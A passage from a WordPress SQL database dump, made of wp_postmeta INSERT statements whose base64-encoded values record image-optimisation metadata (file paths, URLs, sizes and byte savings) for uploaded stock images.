E4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNTA1MDkwNi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTUwNTA5MDYtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU2NCwidGltZSI6MTQ4MzU4MDMyMSwiaWQiOjg3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTUwNTA5MDYtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzE1MDUwOTA2LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNTA1MDkwNi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjM4LCJ0aW1lIjoxNDgzNTgwMzI1LCJpZCI6ODc1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNTA1MDkwNi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTUwNTA5MDYtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzE1MDUwOTA2LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3NDcsInRpbWUiOjE0ODM1ODAzMjgsImlkIjo4NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzE1MDUwOTA2LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNTA1MDkwNi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTUwNTA5MDYtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjgwMSwidGltZSI6MTQ4MzU4MDMzMiwiaWQiOjg3NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29916, 874, 'wpfc_optimisation_reduction', '20665'); 
INSERT INTO `wp_postmeta` VALUES (29917, 874, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUuanBnIiwid2lkdGgiOjU1NjksImhlaWdodCI6MzQ2NywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MDMzNywiaWQiOiI4NzQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTIxLCJ0aW1lIjoxNDgzNTgwMzQwLCJpZCI6ODc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtODAweDQ5OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTgwMHg0OTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS04MDB4NDk4LmpwZyIsInJlZHVjdGlvbiI6MjExNywidGltZSI6MTQ4MzU4MDM0NCwiaWQiOjg3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTc2OHg0NzguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0NzgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS03Njh4NDc4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtNzY4eDQ3OC5qcGciLCJyZWR1Y3Rpb24iOjIwOTQsInRpbWUiOjE0ODM1ODAzNDksImlkIjo4NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0xNjAweDk5Ni5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0Ijo5OTYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0xNjAweDk5Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTE2MDB4OTk2LmpwZyIsInJlZHVjdGlvbiI6NjE2NCwidGltZSI6MTQ4MzU4MDM1NCwiaWQiOjg3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjc3NiwidGltZSI6MTQ4MzU4MDM1OCwiaWQiOjg3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU1OCwidGltZSI6MTQ4MzU4MDM2MSwiaWQiOjg3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYwNSwidGltZSI6MTQ4MzU4MDM2NSwiaWQiOjg3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE3MTIsInRpbWUiOjE0ODM1ODAzNjksImlkIjo4NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjU0MCwidGltZSI6MTQ4MzU4MDM3MiwiaWQiOjg3NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NzQ5LCJ0aW1lIjoxNDgzNTgwMzc1LCJpZCI6ODc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxMTY1LCJ0aW1lIjoxNDgzNTgwMzc5LCJpZCI6ODc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMzcxLCJ0aW1lIjoxNDgzNTgwMzgzLCJpZCI6ODc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3NDg3MzE3NS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzQ4NzMxNzUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc0ODczMTc1LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxODkzLCJ0aW1lIjoxNDgzNTgwMzg3LCJpZCI6ODc0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29918, 873, 'wpfc_optimisation_reduction', '11460'); 
INSERT INTO `wp_postmeta` VALUES (29919, 873, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMuanBnIiwid2lkdGgiOjYwMTYsImhlaWdodCI6NDAxNiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MDM5MSwiaWQiOiI4NzMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTIyLCJ0aW1lIjoxNDgzNTgwMzk1LCJpZCI6ODczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MTAwNiwidGltZSI6MTQ4MzU4MDM5OCwiaWQiOjg3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My03Njh4NTEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtNzY4eDUxMy5qcGciLCJyZWR1Y3Rpb24iOjk1NiwidGltZSI6MTQ4MzU4MDQwMiwiaWQiOjg3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6NDYxNSwidGltZSI6MTQ4MzU4MDQwNywiaWQiOjg3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQ0MiwidGltZSI6MTQ4MzU4MDQxMCwiaWQiOjg3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjM4MywidGltZSI6MTQ4MzU4MDQxMywiaWQiOjg3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQyMywidGltZSI6MTQ4MzU4MDQxNywiaWQiOjg3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250Z